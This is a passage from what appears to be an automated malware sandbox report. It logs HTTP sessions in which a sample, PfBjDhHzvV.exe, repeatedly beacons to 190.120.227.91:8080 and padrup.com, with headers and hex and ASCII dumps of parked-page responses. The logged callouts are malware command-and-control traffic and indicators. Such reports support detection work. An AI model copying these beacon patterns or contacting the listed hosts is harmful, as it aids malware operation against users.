                                                                                                                                                                                                                                  Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67121073&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '37f1530768ab44b6cd73942902d822c64bf3a142fd2');</script><scrip


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  5192.168.2.749790190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.088912964 CEST167OUTGET /sobakavolos.gif?15f8580=23037312 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  6192.168.2.749813185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.303198099 CEST154OUTGET /sobaka1.gif?1edc267=64718030 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454242945 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:38:33 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OAQafcsSPpriwLn4Vap3xaDSeOzLAVW6U3wOZ8H9z+vmS1RUL/cZXn3fsD53xJ4fwq3FHe9V+62+eBWlBD2mDA==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454354048 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzExMy4xMTU5OmYzYjMwYzhlY2MwMzdhMDNjYjhlN2ZlNWQ5MjI5NWU4NDE1YTlmNzk0ZmE3ZjljZWQwMjYzMDA1YWM0NGEyNjk6NjcxMjEwNzkxYzRhNw==';
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454370022 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                  Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454628944 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 66 33 62 37 36 66 65 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                  Data Ascii: 146f3b76fe');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  7192.168.2.749824190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.469178915 CEST167OUTGET /sobakavolos.gif?212b208=34779656 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  8192.168.2.749845185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.707685947 CEST155OUTGET /sobaka1.gif?2a0a14c=132244452 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.799633980 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:38:38 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_J29tlYYQBaLRgwl+e7xuCY96xZ7/enTqQ1nkwIw8396t3bvZUtsJJ/EfATZHITtHZrxQtGQ1nzdAKc41wH0joQ==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.799752951 CEST224INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzExOC40MzQ6NTkxY2U1NmFhMWE0MzMwYTQxMjdhODljMjIzNGJhZGNhOGFjNDI1MTIyMDYxNDA4Yzg5NWQ0YjdjZTNiZjUxMTo2NzE
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.799839020 CEST1236INData Raw: 79 4d 54 41 33 5a 54 59 35 5a 6a 4e 68 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76 61 72 20 78
                                                                                                                                                                                                                                  Data Ascii: yMTA3ZTY5ZjNh';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script><scr
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.800071001 CEST536INData Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 31 30 37 65 26 74 6f 6b 65 6e 3d 27 20 2b 20 65
                                                                                                                                                                                                                                  Data Ascii: } } xhr.open('GET', path + '/ls.p' + 'hp?t=6712107e&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, 'cdc09f5584d459c864a06c10124b178a807c4142a02');</script><script type='text


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  9192.168.2.749851190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.828929901 CEST168OUTGET /sobakavolos.gif?2bf5c9b=276573090 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  10192.168.2.749881185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:43.152618885 CEST155OUTGET /sobaka1.gif?3467cb5=274755465 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.218116999 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:38:44 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_UcF6yvWW25M0sB+iCVWMx+bBfLNX7x4vE7bglqjTRZxtNxNV0wdoH3Uue8WWpUgcrYniZrD2N/3BZyspoHxEBQ==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 31 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.218306065 CEST203INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzEyMy44ODMyOjc4NWM3OTYxZmFiZGIyMmY2NDgxNWM0YjIyNmJjZDk1MGQ1ZGY0NWJkNjg1NTgzZTgw
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.368341923 CEST1236INData Raw: 36 66 39 0d 0a 4d 6a 46 68 4e 57 45 30 4e 47 49 34 5a 57 5a 6b 5a 54 51 36 4e 6a 63 78 4d 6a 45 77 4f 44 4e 6b 4e 32 45 77 4d 77 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65
                                                                                                                                                                                                                                  Data Ascii: 6f9MjFhNWE0NGI4ZWZkZTQ6NjcxMjEwODNkN2EwMw==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scr
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.368590117 CEST561INData Raw: 74 68 65 20 72 65 71 75 65 73 74 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73
                                                                                                                                                                                                                                  Data Ascii: the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67121084&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '00afc74c6f86a4769cc815d1723cbb5c8e5d6777');</scr


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  11192.168.2.749888190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.390918970 CEST168OUTGET /sobakavolos.gif?36c07fa=459292624 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  12192.168.2.749913185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:48.688736916 CEST155OUTGET /sobaka1.gif?3f9f77c=600421212 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.758708000 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:38:49 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_q1S7DbsdsTeCX6kj1aldVLI3vsZW/iGZdZRQbafKPu6E/vj9Rod65AEECMs5YmaOhwF78uLnK6IYq5MrhG9dOQ==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 31 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.758846998 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzEyOS40MjUzOmFhMGY1MjkzNTE2NWJhMWI3MzhkNTFkZTE4NGM5MjVmN2YyZDBiNGNhMDUxMzZlZThj6f9ZWY1MGIzMzEwYzE4MmQ6NjcxMjEwODk2N2Q
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.758862972 CEST764INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                  Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  13192.168.2.749922190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.776119947 CEST168OUTGET /sobakavolos.gif?4194e9e=343836950 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  14192.168.2.749943185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
